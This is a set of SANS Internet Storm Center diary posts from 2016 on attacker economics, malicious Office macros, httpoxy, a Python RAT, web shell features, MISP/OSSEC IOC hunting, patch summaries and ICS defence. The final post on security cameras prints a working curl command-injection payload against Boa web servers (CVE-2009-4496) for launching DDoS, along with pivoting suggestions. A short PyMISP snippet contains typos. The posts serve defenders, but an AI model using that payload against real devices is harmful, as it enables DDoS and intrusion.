  • There is a common notion that they are in for a big payday. This is really the exception, rather than the rule, with average annual earnings from malicious activity totaling less than $30,000, which is a quarter of a cybersecurity professional’s average yearly wage. This limited earning power becomes even less attractive when you consider the added legal risks including fines and jail time.
  • Time is the defining factor to change the adversary’s arithmetic. As network defenders, the more we delay adversaries, the more resources they will waste, and higher their cost will be. We found that increasing the time it takes to break into and carry out successful attacks by less than 2 days (40 hours), will deter the vast majority of attacks.
  • Finally, it is all about how you protect yourself. Because attackers are so opportunistic, and their time is so valuable, we can change the attack equation with next-generation security approaches. We found that organizations rated as having “excellent” security took twice as long to breach, when compared to those rated as “typical.” Putting the right security in place makes all the difference.

 

To understand how to influence an attacker’s economic motivation, we must consider what I call the “adversary arithmetic,” which boils down to the cost of an attack versus the potential outcome of a successful data breach. If malicious actors are putting in more resources than they are getting out, or we decrease their profit, being an attacker becomes much less attractive. What we have seen is simple, more malware and exploits, more effective toolkits, combined with cheaper computing power has lowered the “barrier to entry” for an attack, and resulted in the increase in attacks we covered in the last slide.

Using the survey finding as a guideline, let’s walk through what we can do to reverse this trend.

It is a random mugging, not a robbery. Data suggests that majority of adversaries are motivated by quick and easy financial gain. As opposed to a “movie script heist”, attackers are looking for opportunistic street “muggings” that take advantage of easy targets. About 69% of them are motivated by profit, 72% of the attacks are opportunistic.

  • The primary motivation of attackers is profit! This will guide every other finding in this report, and how we shape our responses. It is important to note that there is a spectrum of malicious actors, and organizations must always maintain awareness of potentially dangerous, highly targeted attacks, or nation-state led activity such as cyber espionage or cyber warfare. However, if we can disincentive anywhere near that number of attackers, we will be making a huge dent in the threat landscape.
  • The majority of attackers are opportunistic, meaning they are looking for the quick and easy job. When put into this context, organizations that prioritize making themselves a harder target, will actively deter a significant amount of potential breaches.

Ponemon suggests that the financial motivation for profit is being supported by a decline in the cost for conducting an attack. 56% of respondents believed that time & resources required to conduct successful attacks have gone down. This is the proof behind the cost curve, and why it is more important than ever to focus on increasing the cost. We cannot allow adversaries to maintain this “edge,” as they will continue to erode our trust in the Internet, if we allow this to happen. Let’s look at the reasons behind this cost decrease.

It is not enough to know that costs are decreasing, we must examine why this is occurring, in order to combat each reason. From the survey results, we see a few key facts bubble to the surface:

  • There are more available malware and exploits, as we discussed in the “adversary arithmetic,” being the largest factor at 64%.
  • Next, we see an interesting trend, with 47% citing increased attacker skills. It is not all about the availability of threats, but the sharing of best practices and learning.
  • 47% claim better attack toolkits are responsible, and we’ll see why these are so powerful in the next slide.
  • The final two are very much part of the same trend as improved skills. There is more intelligence on targets, making the recon stage of an attack easier, and the threats more tailored, but we also saw collaboration among attackers being a major factor. What this adds up to is the big impact the criminal underground has. It is not just independent attacker groups, but online forums, just like we have for our organizations. Except on these, malware is traded/sold, techniques are shared and perfected, and attackers can learn from each other

Toolkits automate the entire process, and have become increasingly sophisticated. They can be crafting to do essentially anything, usable by anyone, without much technical skill. Dark Comet and Poison Ivy are two well-known examples, which have been used in some very high-profile attacks, including against Syrian activities and government organizations. They aren’t just for the “easy targets.”

 

Now that we understand how powerful these toolkits can be, let’s dive into the report findings on how they have evolved.

The data here proves our hypothesis: toolkits are highly effective, and make being an attacker much easier you can see how nearly 70% cited how using a toolkit make it easier to be an attack, with 64% saying they are highly effective. Given this, what is concerning is the scale at which they have been increasing in popularity, with the study finding 63% cited increased usage.  Lastly, and most importantly, is their relative low cost. With only $1,387 spent by attackers on average, we can see how they can act as force multipliers in the threat landscape. It is also important to note that attackers ARE buying these. They are serious applications with developers, support, and an entire ecosystem out there. There are even attackers following usage-based models for their software! Rent a botnet, ransomware as a service. Consider how this compares with the Enterprise software you use and purchase.

The survey found that the average attacker is making less than $30,000 on an annual basis! It literally doesn’t pay to be the bad guy, as this is about one quarter of the annual salary of a Cybersecurity professional. There have been many cases of former attackers turning around and applying the skills they learned to help the security community. Not only this, but we have such a need for talented security operators, that leveraging this group to help defend the network, rather than attack, is good business for everyone. Think about Pentesters who really know how to break into networks, application security developers who know how to find vulnerabilities.

You also must consider the legal risk of being an attacker, which can include large fines and jail time. The question we must ask is how can we convert attackers into good guys? Paying them well is a good start.

Now we come to the most important finding in the report: How can we deter attacks. Some of the findings may be surprising to you. Delaying an attacker by less than 2 days (40 hours) will deter 60% of attacks. Think about an average week, and how much of an impact this simple addition can have. They will give up and move on to the next opportunistic target after a relatively short time period. Every single security control, policy, and training you deploy will all add to how long it takes them to break it, and it all matters.

It was surprising just how much time is the defining factor to change the adversary’s arithmetic. As network defenders, the more we delay adversaries, the more resources they will waste, and higher their cost will be. We can interrupt the march toward more and more lower cost attacks, by taking a slightly different perspective on the problem.

Another finding is that companies rates typical took less than 3 total days to breach (70 hours). This is HALF the time is takes for well protected organization, as 140 hours. Combine this finding with the 70% who will walk away when presented with a strong defense, and how adding 40 hours will deter 60% of attacks, the adversary equation can begin to flip in the “good guys” favor.

So now what?

Based on the research, we know that attacks are increasing due to their decreasing cost, which has a number of important factors. We also know that attackers are motivated by profit. With that mindset, we need to think about this challenge from the less of increase the cost of attacks and decreasing their profit motivation. We have split this into three categories:

  • Remove the profit motivation by forcing adversaries to build custom, expensive attacks each time. It is extremely costly to build new malware, identify new exploits, and constantly change your tactics for every attack.
  • Automatically identify and prevent new threats. When new attacks are developed, or evolution within current ones, we need to quickly turn them into known threats and block them in real-time. This means all the time and money that was spent to craft something novel is instantly outdated. This needs to be done on the network and the endpoint level.
  • Finally, you need visibility into your network, whether it is in the cloud, data center, mobile devices, or anywhere in-between. This visibility will allow you to classify the threats and malicious actors attempting to breach your organization, and feed that information into proactive steps to reduce your risk posture.

6 Comments

Published: 2016-07-19

ASN.1 Anyone? CVE-2016-5080

*Queue Back to the Future Music* Over more than a decade ago there was a major discovery in ASN.1 that contributed to arguably one of the worst vulnerabilities in a long time. Fast forward *Queue awful fast forward tape music* to 2016 and ASN.1 is here again. Please reference this link https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080 for the major details as this unfolds regarding CVE-2016-5080.

So far, according to the CERT page [3] for vendors reporting in and so far our winners of the ASN.1 award seem to be Objective Systems and Qualcomm Incorporated are reporting impact from  CVE-2016-5080. Honeywell and Hewlett Packard Enterprise are reporting “Not Affected”. Many other vendors are in an unknown state.

Wait Richard, what the h^&& is ASN.1? [4] ASN.1 is a standard that is jointly maintained and governed by the International Organization for Standardization (ISO), International Electrotechnical Commission (IEC), and International Telecommunication Union (ITU-T). It is a syntax notation that makes up rules for encoding, transmitting, and decoding data [4]. Basically, it does A LOT of stuff and it is EVERYWHERE *a slightly panicked tone*.

Please review this CVE (CVE-2016-5080) and monitor it closely. We at the storm center will monitor this and update it as it unfolds.

[1] https://www.sans.org/reading-room/whitepapers/protocols/snmp-potential-asn1-vulnerabilities-912

[2] https://github.com/programa-stic/security-advisories/tree/master/ObjSys/CVE-2016-5080

[3] http://www.kb.cert.org/vuls/id/790839

[4] https://en.wikipedia.org/wiki/Abstract_Syntax_Notation_One

0 Comments

Published: 2016-07-19

Office Maldoc: Let's Focus on the VBA Macros Later...

I received another malicious Office document.

oledump.py shows it contains VBA macros, but also a userform (A4 - A7).

Before we look at the VBA macros, we'll take a look at the values in the userform (A7 .../o).

It looks like it contains BASE64 text. Let's use a plugin to take a look at the values:

When we use option -q, we see just the output from the plugin:

That output can be piped into base64dump.py to see it we detect BASE64 text:

Not all text is recognized as valid BASE64. Let's try if concatenating all text produces a different result. We do this with option -w to ignore all whitespace:

It's clear now that this is valid BASE64, and that the decoded text starts with %COMSPEC% ...

So let's do a ASCII dump of that BASE64 text:

Now it's clear that this is a downloader using PowerShell. We can also dump the code:

When we analyze the VBA macros, we will find code that references the userform to concatenate the BASE64 text. It then decodes it and executes it.

But this time, just by poking a bit at the BASE64 text, we were able to recover the malicious payload.

 

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

6 Comments

Published: 2016-07-18

HTTP Proxy Header Vulnerability ("httpoxy")

"HTTPoxy" refers to an older vulnerability in how web applications use the HTTP  "Proxy" header incorrectly. The vulnerability was first described in 2001 in libwww-perl, but has survived detection in other languages and plugins until now. The vulnerability can be found in some popular implementations, but is not affecting the vast majority of web applications.

According to RFC 3875, which described CGI ("Common Gateway Interface"), the content of the "Proxy" header is assigned to the HTTP_PROXY environment variable. Like all user supplied data, this value needs to be validated, but sadly, some web applications fail to do so

The effect is that outbound web requests from the application may use a proxy provided by the user.

You are vulnerable if you are not validating the Proxy header, AND if you are using specific frameworks for outbound web requests that use the HTTP_PROXY environment variable.

For a full list of affected applications, and more details, see https://httpoxy.org . The site also suggests specific mitigation techniques, like removing the Proxy header from all inbound requests, which is probably a sound technique to minimize the impact of this issue.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

2 Comments

Published: 2016-07-16

Python Malware - Part 3

I used my YARA rule PE_File_pyinstaller to scan for Python malware for some time now, and came across some interesting samples (after discarding false positives, PyInstaller is of course also used for benign software).

This is a sample I found (MD5 B79713939E97C80E204DE1EDC154A9EB).

I use pyinstxtractor.py to extract the Python code from the EXE created by PyInstaller.

This creates a folder (sample filename + _extracted):

File implant contains the malicious Python code:

This turns out to be a Remote Access Tool (RAT) that uses Gmail as C&C.

It can execute shellcode, upload and download files, make screenshots, execute commands, lock the screen and log keystrokes:

Armed with this information and with the help of Google, I found the code for this sample back on Github.

If you come across malicious PE file created with PyInstaller, don't use a disassembler like IDA Pro, but extract the Python code.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2016-07-15

Name All the Things!

With our more and more complex environments and processes, we have to handle a huge amount of information on a daily basis. To improve the communication with our colleagues, peers, it is mandatory to speak the same language and to avoid ambiguities while talking to them. A best practice is to apply a naming convention to everything that can be labeled. It applies to multiple domains and not only information security. Examples:

  • Computers (hosts)
  • People (logins, email addresses, profiles)
  • Programs & source code (functions, classes and variables names)
  • Files & directories
  • Databases (index, fields, ...)
  • ...

A good naming convention is the one that is approved by all the parties and that will help you to perform your job better. If everybody is free to define a new one (while I was working for a company in Belgium, the servers were named with Belgian beers), there are some rules to follow. The example of Belgian beers is a good one: even we have many beers, a big organization with plenty of servers will be limited in the choice of names. Some names will be very simple, other too complex. Here are some rules to follow if you need to implement a naming convention:

  • Choose easily and readable identifier names
  • Favor readability over brevity
  • Do not  non-alphanumeric characters (stick to '[a-z][0-9][-_]')
  • Avoid using identifiers that conflict with keywords of widely used terms
  • Keep it in "English"

Some rules are more specific to certain types of data. Example for files and directories, use timestamps like 'YYYYMMDDHHMMSS' in the beginning of file names to have an automatic order. Prepending names with the project number or the customer's ID can be useful to find quickly details about a customer.

In the security landscape, we can apply naming conventions to many "objects" or "assets". In the configuration of security tools, objects must respect a naming convention. Examples:

  • Objects in a firewall configuration
  • Rules in an IDS server
  • Groups and IOCs' in a threat intelligence solution
  • In Forensics investigation (files, evidences)

This sounds easy to implement but it's not always the case. There are also bad examples like the anti-virus vendors who often use their own names to identify a piece of malicious code. Have a look at a sample report on VT to have an idea of the disaster:

This isn't a recent issue, it was already discussed in 1991(!): http://www.caro.org/articles/naming.html.

And you? Do you have good rules to share to build a naming convention? What did you normalize? Feel free to share.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 Comments

Published: 2016-07-13

The Power of Web Shells

[Warning: this diary contains many pictures and may take some time to load on slow links]

Web shells are not new in the threats landscape. A web shell is a script (written in PHP, ASL, Perl, ... - depending on the available environment) that can be uploaded to a web server to enable remote administration. If web shells are usually installed for good purposes, many of them are installed on compromised servers. Once in place, the web shell will allow a complete takeover of the victim's server but it can also be used to pivot and attack internal systems.

In a recent investigation, I found on a shared platform a compromised website that was delivering phishing pages. I was able to get access to the archive containing the phishing kit but also a web shell. It was also installed on the server and the location was easy to guess. The web shell is presenting itself as "RC-SHELL" and is not a brand new one (I found reference to it in 2013) but it has a very low detection rate in VT (4/55) and was uploaded for the first time a few hours before me. Maybe it has been improved or updated?

Modern web shells are very powerful and offer plenty of features to the attacker. Because some pictures are worth a thousand words, I decided to make a tour of the interface to give you more details about modern web shells and to show their power. This web shell is written in PHP and, as usual, access to the web interface is restricted via hardcoded credentials. The login / password hashes are in the source code. A quick search in rainbow tables returned "test" for the login and password!? This time, it was even easier: the access was open (the authentication was disabled in the code). Note that the source code also contained the e-mail address of the owner.

When you access the URL, here is the default screen:

On top of the screen, you can see details about the host and basic PHP settings like the "safe-mode" status, available databases support. Then, the single-line menu to access all the features. Let's review them.

The menu "Files" gives access to a file manager that can be used to browse the local file system (with the web user UID restrictions) and perform actions on files (copy, delete, rename, move, etc):

The menu "Search" performs file search operations (think about the "find" Linux command) but you can also search for specific contain inside files (like "grep"):

The "Upload" menu transfers files on the local file system. Files can be uploaded from the local drive (on the attacker's computer) or fetched from a remote location (using common protocols like HTTP, FTP):

The "Cmd" menu executes shell commands on the target (this is really the core feature of a web shell). Commands are executed (with the web server UID rights) and output is returned in the browser: 

The "Eval" menu offers the same features as "Cmd" but executes native PHP code. This is a "PHP Shell":

The "FTP" menu gives access to a powerful FTP client like WinSCP or any other graphical tool:

The "SQL" menu provides tools like PHPMysqlAdmin. It allows to interact with SQL servers:

The "Mailers" menu, as the name suggests, is a tool to send spam. Simple emails can be send but also campaigns based on a CSV file:

The "Calc" menu is a toolbox which provides tools like hash calculators, encoders, converters:

The "Tools" menu is my preferred one. It offers many tools to pivot internally and attack other resources: brute-force, code injection, shell binder, port-scanner, etc:

Finally, the two last menus are used to manage processes on the box (à la "top") and to display system information about the host (CPU, memory, file systems, ...):

As you can see a modern web shell is a powerful tool. Keep in mind that a web shell will be executed with the rights and permissions of the web server (ex: "www-data" on a Linux system). To reduce the risks, apply best practices like:

  • Run the web server in a restricted environment (a VM, a Docker container, a chroot() jail).
  • Do NOT allow access to privileged access via commands like sudo.
  • Do NOT give full DBA access to your database, restrict access to required database/tables and allow required SQL commands only.
  • Implement egress filters and restrict communications with the outside world.
  • Protect your web server directories against write operations

Do not hesitate to share your stories about web shells. Did you find one, how, where?

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

8 Comments

Published: 2016-07-13

Drupal: Patch released today to fix a highly critical RCE in contributed modules

Drupal announced that they will release today (Wed July 13th 2016 16:00 UTC) a patch that will fix highly critical remote code execution vulnerabilities in contributed modules. Drupal core is not affected.

The vulnerability is a "PHP Arbitrary Code Execution" and is rated up to 22/25 (based on risk calculation model used by Drupal - details here). The vulnerable modules are used on between 1.000 and 10.000 instances.

If you maintain one or more Drupal websites, review the list of affected contributed modules and apply the patch as soon as possible if you're affected.

Link to the advisory ID: DRUPAL-PSA-2016-001

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2016-07-12

Hunting for Malicious Files with MISP + OSSEC

A few months ago, I wrote a diary called “Unity Makes Strength” which was illustrated with an example of integration between a malware analysis solution and a next-generation firewall. The goal is to increase the ability to block malicious traffic as soon as possible. Today, I’d like to explain how to improve the detection of malware on Windows computers thanks to the integration of MISP and OSSEC. I already presented the Malware Information Sharing Platform in another diary. About OSSEC, in a few words, it is a host-based IDS with many extra features like log centralisation, real-time alerting, file integrity monitoring and much more. 

To achieve the detection of malicious files or registry keys on the Windows host, let's use a very interesting feature of OSSEC called "rootcheck" that performs rootkit detection. OSSEC comes with a default configuration that contains interesting examples but the malware landscape changing daily, this configuration is obsolete. The goal is to search a MISP database for recent IOC's and inject them into the OSSEC configuration. Both solutions are really open to the world and an integration is quite easy. 

MISP instance can be fully managed with the available REST API. To simplify the use of this API, there is even a Python library called PyMISP. Here is a very simple example to get the latest events from MISP:

from pymisp import PyMISP
from keys import misp_url, misp_key, misp_verifycert
misp = init(miss_url, misp_key)
result = misp.download_last(“1d”)
for event in result:
  print json.dumps(e) + “\n"

The data flow will be:

MISP > PyMISP.py (via the REST API) > IOC-list > OSSEC > OSSEC agents

I wrote a small script called "MOF" which stands for "MISP OSSEC Feeder". It extracts the interesting file names from MISP. The following type of attributes are extracted:

  • Artefacts dropped
  • Payload delivery
  • Payload installation

To reduce the risk of false positives, only filenames containing Windows environment variables are exported (%TEMP%, %WINDIR%, %APPDATA%, ...). Registry keys are also exported. The script usage:

# ./mof.py -h
usage: misp_ossec_export.py [-h] -t TIME [-o OUTPUT]

Extract IOC's from MISP and generate an OSSEC rootcheck file.

optional arguments:
  -h, --help            show this help message and exit
  -t TIME, --time TIME  Time machine (ex: 5d, 12h, 30m).
  -o OUTPUT, --output OUTPUT
                        Output file
# ./mof.py -o /var/ossec/etc/shared/misp_windows_ioc.txt

The script requires the PyMISP library that can be installed easily via a "pip install pymisp".

The generated rootcheck configuration file looks like below. IOC's are grouped by MISP events.

#
# OSSEC RootCheck IOC generated by MOF (MISP OSSEC Feeder)
# https://github.com/xme/
#
# Generated on: Mon Jul 11 22:06:56 2016
# MISP url: https://misp.home.rootshell.be/
# Wayback time: 30d
#

[MISP_2073] [any] [Packrat: Seven Years of a South American Threat Actor]
r:HKLM\SOFTWARE\Microsoft\Active;
r:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies;
r:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msconfig;

[MISP_2200] [any] [Click-Fraud Ramdo Malware Family Continues to Plague Users]
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\LastLoggedOnProvider;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\IconUnderline;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\HangDetect;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\LastProgress;
r:HKCU\SOFTWARE\Adobe\Acrobat Reader\14.0\Globals\ShowTabletKeyboard;
r:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BluetoothManage;

[MISP_2210] [any] [Jigsaw Ransomware Decrypted: Will delete your files until you pay the Ransom]
f:%USERPROFILE%\AppData\Roaming\Frfx\;
f:%USERPROFILE%\AppData\Roaming\Frfx\firefox.exe;
f:%USERPROFILE%\AppData\Local\Drpbx\;
f:%USERPROFILE%\AppData\Local\Drpbx\drpbx.exe;
f:%USERPROFILE%\AppData\Roaming\System32Work\;
f:%USERPROFILE%\AppData\Roaming\System32Work\Address.txt;
f:%USERPROFILE%\AppData\Roaming\System32Work\dr;
f:%USERPROFILE%\AppData\Roaming\System32Work\EncryptedFileList.txt;

The next step is to integrate this new file into your OSSEC agent.txt file. Please have a look at the OSSEC documentation for a complete description of this shared agents configuration. Here is mine (stored in '/var/ossec/etc/shared/agent.conf' by default):

<ossec_agent os="Windows">
  <rootcheck>
    <windows_audit>./shared/win_audit_rcl.txt</windows_audit>
    <windows_apps>./shared/win_applications_rcl.txt</windows_apps>
    <windows_malware>./shared/misp_windows_ioc.txt</windows_malware>
  </rootcheck>
</ossec_agent>

To implement a full automation, install the script on your OSSEC server and execute it from a crontab at a regular interval (example: once a day). Note that the agent.conf is not pushed immediately to agents - it may take a while depending on your configuration! The Python script is available here. And you, how do you search for malicious files across multiple hosts/locations?

Happy hunting!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

 

2 Comments

Published: 2016-07-12

Microsoft Patch Tuesday Summary for July 2016

As usual for the second Tuesday fo the month, Microsoft today released its monthly security updates. Microsoft released a total of 11 bulletins. 6 are rated critical, and the remaining five are rated important.

One of the Bulletins (MS16-093) affects Adobe's Flash player and is a copy of Adobe's advisory.

None of the bulletins stick out as "special". There are no bulletins that affect vulnerabilities for which exploits have been observed. But two bulletins included already known vulnerabilities:

%%cve:2016-3287%% , a vulnerability in Secure Boot.
%%cve:2016-3272%% , an information disclosure vulnerability in the Windows Kernel.

 

I don't consider either vulnerability very serious.

As far as prioritizing the patches go, I would as usual attend to the Internet Explorer, Edge, Flash and Office patches first.

The printer spool issue is "interesting". An attacker could use the vulnerability to install arbitrary print drivers, which of course would lead to arbitrary code execution. As a workaround, Microsoft suggests that you do restrict printer that your users can use to print. This sounds like a good control, and you should use this vulnerability to make sure the printer configurations are sufficiently adjusted.

For a full list of Bulletins, see our summary here. If you prefer a more structured view, you can also retrieve the bulletin data via our API here.

---

Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

7 Comments

Published: 2016-07-10

Lessons Learned from Industrial Control Systems

While at SANSFire a few weeks ago, I had the good fortune to sit in on Robert M. Lee as he taught ICS515: ICS Active Defense and Incident Response (https://www.sans.org/course/industrial-control-system-active-defense-and-incident-response).  I'm not responsible for defending a power-plant's network nor do I have a manufacturing floor in my enterprise.  I've also not worked with Modbus outside of CyberCity (https://www.sans.org/netwars/cybercity).  However, like many of you, I have certain business-critical systems running on legacy hardware or requiring now-unsupported Operating Systems.  These are the systems that you can't patch, or that even if they experience a compromise, you can't immediately shut them down.  How to you secure networks with such constraints?

Architecture and Isolation

"Why are these even connected to the Internet to begin with?" many would ask (see the last entry, "Pentesters (and Attackers) Love Internet Connected Security Cameras!" (https://isc.sans.edu/forums/diary/Pentesters+and+Attackers+Love+Internet+Connected+Security+Cameras/21231/) for more examples of the problem.) 

That is obviously step one, don't connect critical systems directly to the internet.  But what about your internal, flat network?  You may find yourself responsible for such a situation, how do you go about rearchitecting the network?  Start small by isolating the critical systems from the general network.  That MRI machine that you're not allowed to patch, probably shouldn't visible from everywhere in your network, also it probably shouldn't be able to go everywhere in your network, or perhaps even to the internet (it's not like it's reaching out to get regular updates or anything.)

If you have a poorly-architected network, you probably have a poorly instrumented one.  Kill two-birds with one box by dropping in a system between your general network and your critical systems.  This will act as both firewall and sensor.  Your critical systems won't be moving as much traffic as your perimeter and general network, so take the opportunity to collect full packet captures, or just run Bro to extract certain artifacts and keep netflow or ipfix data, this will be used later... 

Critical Systems do Critical Things, and only Critical Things

Just as you limit access to and from the critical systems, lock down what these can be used for.  These systems shouldn't have general internet access, if they require certain access run a proxy for them to constrain that access.  They also shouldn't be getting email (although they might be sending it.)  It's simply "policy of least privilege" re-tuned a little.

You've probably run into some resistance trying to get application whitelisting deployed out to your general users.  These critical systems are perfect locations to get started with the technique.  If any systems have formal change-control policies, these are likely the systems, they update rarely, and you want to be alerted at any changes made to the system as soon as possible.

Baseline!

These should probably be your most-instrumented systems on your network.  New services shouldn't be appearing and disappearing, the files on the system should remain relatively static, so something like tripwire or samhain (http://www.la-samhna.de/samhain/) won't be generating a lot of alerts, and if they do, they'll not likely be false alarms.

This is also a good place to start testing any anomally detection tools.  These systems are tied closely to your business, so they'll likely mimic the activity cycles of your business.  Changes to their regular cycles should be detected and scrutinized.

Other Things I Learned...

There are going to be times when you just can't immediately follow your IR process, either the system is to unstable support your forensic agents, or a business process will trump your urge to clean up a malware infection for a period of time.  This class gave me a framework for handling those decisions as well as providing more options than simply "nuke it from orbit." 

It also gave me more context around how Indicators of Compromise (IoC) are created and used in the ICS community.  In my circles an IoC of "DNS traffic to 8.8.8.8" is usually scoffed at.  While that might be common behavior in a general user population, you probably shouldn't see it coming from you city's traffic-control network.

 

Why Should You Care?

On the surface, the ICS environment looks untenable: you can rarely patch, uptime is paramount, security is an afterthought in software development.  However, it is defensible.  If it can be done in this environment, it can be done in yours as well.

If you don't think you've got ICS equipment in your environment, ask yourself a couple of questions.  "Do I have a building that's four or more stories tall?"  If yes, you likely have some sort of building management solution in place.  Look for BACnet (look for UDP/47808.)

 

"Do I have a datacenter?"  If yes, then you likely have industrial Uninterruptible Power Supply units, air handlers, and coolers.  Say, who manages those for you?  Do they VPN to do that?  Do they have a cellular card in them for remote management?

-Kevin Liston

 

 

 

 

 

 

 

 

0 Comments

Published: 2016-07-08

Malware being distributed pretending to be from AU Fedcourts

Earlier today people have started reporting that they have received a subpoena email from the Australian Federal courts.

The email links through to a various compromised sites which redirect the user to a federalcircuitcourt.net web server.  Once on the web server you are expected to enter a number and the captcha shown before a case.js file is downloaded.   

The case.js file is being looked at at the moment and the diary will be updated with any findings.  In the mean time feel free to block the domain federalcircuitcourt.net in your web proxies. This is not a legitimate domain. 

The federal circuit court has issued a media release -->  http://www.federalcircuitcourt.gov.au/wps/wcm/connect/fccweb/about/news/mr080716

​If you receive one of these emails feel free to contact us via the contact form and if you can provide the headers of the email and the URL being used for the link that would be appreciated. 

Regards

Mark H - Shearwater

 

0 Comments

Published: 2016-07-07

Patchwork: Is it still "Advanced" if all you have to do is Copy/Paste?

The term "APT" often describes the methodology more than it does describe the actual exploit used to breach the target. Target selection and significant recognizance work to find the right "bait" to penetrate the target are often more important than the final vulnerability that is exploited. Traditional defenses like anti-malware systems and blocklists are not tuned to look for the vulnerability being exploited but are more looking for specific known exploits which can easily be obfuscated using commodity tools.

Cymmetria today released a research report showing results of a "deception" campaign they launched to learn more about a particular actor. In this case, the attack was targeting specific individuals using a spear phishing campaign, which are "APT" characteristics. The vulnerability being exploited (CVE-2014-4114) is about two years old and only affects PowerPoint 2003 and 2007, something you would expect to be patched by now. Privilege escalation was achieved using the UACME code which can be found in the public domain.

To exploit and pillage the infected system, open source software like Metasploit was then used to establish a remote shell via Meterpreter.

Cymmetria calls this a "Copy / Paste APT" in that it used code that was mostly copy/pasted from various well-known sources and methods which would be taught in an intermediate penetration testing class.

Another interesting aspect is the way in which Cymmetria used its deception tools. The overall idea of deception isn't exactly new, but it has seen a renaissance in the last couple years. In the past, "Honeypots" were mostly used by researchers to learn more about commodity attacks. Researchers usually configured systems with known vulnerabilities in unprotected networks to lure attackers and to learn more about their methods and objectives. Modern commercial deception tools take a slightly different approach, more along the idea of "honey tokens" then honeypots. The goal of these tools is to detect more advanced attacks. Systems are not made particularly vulnerable to entice the attacker, but instead, these systems follow more the ideas of "honey tokens," small bits of data that entice the attacker to pursue specific targets that are used to detect the attacks. For example, Cymmetria deployed specific file shares that would look enticing to an attacker, and left documents behind with pointers to RDP servers that were part of the deception campaign. 

In this particular case, after the system was infected via the PowerPoint document, the attacker exfiltrated numerous documents from the system. It took about three days until the attacker discovered the deception file share and tried to access it. The attacker then took the bait, and also connected to the RDP system. However, they were not able to log in as the document describing the RDP service did not include credentials. Instead, credentials would have been available in memory on the infected system (e.g. the attacker would have to run mimikatz).

Cymmetria published IoCs as part of their release. You can use them to look for this threat in your systems. But I think the lesson should be that even more advanced actors can be tricked into using honey tokens, which creates a relatively low-cost opportunity to detect a compromise early. In this case, it took about three days, which doesn't sound great at first, but keep in mind that these attacks are usually only detected after months using more traditional means.

[1]  https://www.cymmetria.com/patchwork-targeted-attack/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2016-07-06

Pentesters (and Attackers) Love Internet Connected Security Cameras!

A recent story making the rounds in both the infosec and public press is the recent use of internet-connected security cameras as a base for DDOS attacks.  They don't have a lot of CPU, but they're linux platforms that are easily hackable, never get updated and usually have good bandwidth available to them.

This shouldn't come as any surprise to folks who are in the security business, or those who do any kind of a product eval before they plug new gear into their network.  I see security cameras on network assessments and penetration tests regularly.  A simple NMAP -sV scan (to show service versions) will typically light up a security camera as:

PORT      STATE SERVICE     VERSION
23/tcp    open  telnet      security DVR telnetd (many brands)
80/tcp    open  http        Boa HTTPd 0.94.14rc21
1025/tcp  open  NFS-or-IIS?
9000/tcp  open  tcpwrapped
56575/tcp open  unknown

The give-away is that Boa web server.  For some reason, security camera vendors seem to have standardized on this as their web service.  Or more likely, one vendor has, and they're selling the chipset to everyone else to put inside of their cases.

Let's take a look at that.  The Boa project has an active website (www.boa.org), and version 0.94.14rc21 is listed as the latest development release, complete with signatures.  Sounds great so far right?  Except when we look at the code, it was posted Feb 2005 (yikes!).  It looks like this project is no longer seeing active development (as of 11 years ago!).  So even if the vendor supplies updates and you apply them, there's no fixing the web portal that faces the network - and so often the public internet.

A quick google shows that this version of the web server is subject to a command injection vulnerability, as described in CVE-2009-4496. Exploit-db has an example curl one-liner that demonstrates this:  https://www.exploit-db.com/exploits/33504/ , vulndb has a larger write-up here: https://vuldb.com/?id.51542

Nessus has identified this remote code exec issue for years (plugin 47463).

Shodan identifies 936,736 of these servers on the public internet - because of course it's just too much trouble to VPN in to view the video footage on your ATMs or other physical assets

So a DDOS really is that simple.  Just using a curl script, you can start a "ping -t" or "ping -t -l 1000" against your victim (I picked 1000 just to prevent any packet loss due to fragmentation prevention).  With a few thousand camera devices, you have what the victim will perceive as a sophisticated DDOS attack.  Your curl string to attack a test "1.1.1.1" ip address with default sized icmp echo requests would be:
curl -kis http://camera.public.ip.address/%1b%5d%32%3b%70%69%6e%67%20%2d%74%20%31%2e%31%2e%31%2e%31%07%0a

The first few characters are the escape sequence: %1b%5d%32%3b

The string "ping -t 1.1.1.1" is represented in hex as: 70%69%6e%67%20%2d%74%20%31%2e%31%2e%31%2e%31

The string terminates with: %07%0a

Wireshark catches the icmp echo requests (replies are filtered out) - yes, this did work first time for me:

That aside, what folks are missing in all of this is that these cameras are usually connected on the inside, trusted network, right there next to the servers.  Folks seem to find it too much trouble to make a DMZ for these things.  So the majority of these cameras make dandy pivots inbound to the customer's servers and workstations - your command string isn't restricted to "ping", you can run anything you want on the box (that the web service has rights too).  From the public internet, you could easily craft an inbound proxy or relay, giving you full access to the internal network - or at least long enough to establish a more "reliable" reverse shell or vpn solution.  Or just use teamviewer or logmein if you have that kind of access, you're less likely to trigger an IPS if you use the same tools that the IT group uses!

The remediation for this?  There are a number of things you can do, depending on your situation:

  • Scan your network, look for vulnerable services like this.  NMAP will do the job with some legwork, tools like Nessus or OpenVAS will make it easier and smack you with the proverbial "LOOK HERE" two-by-four.
  • Put vulnerable things that can't be fixed and can't easily be replaced (like these cameras) into a DMZ or a "jail" VLAN, and don't give that subnet access to anything on the inside network.
  • Restrict access to these cameras to VPN or internal access only (you can reach them, they can't reach you).
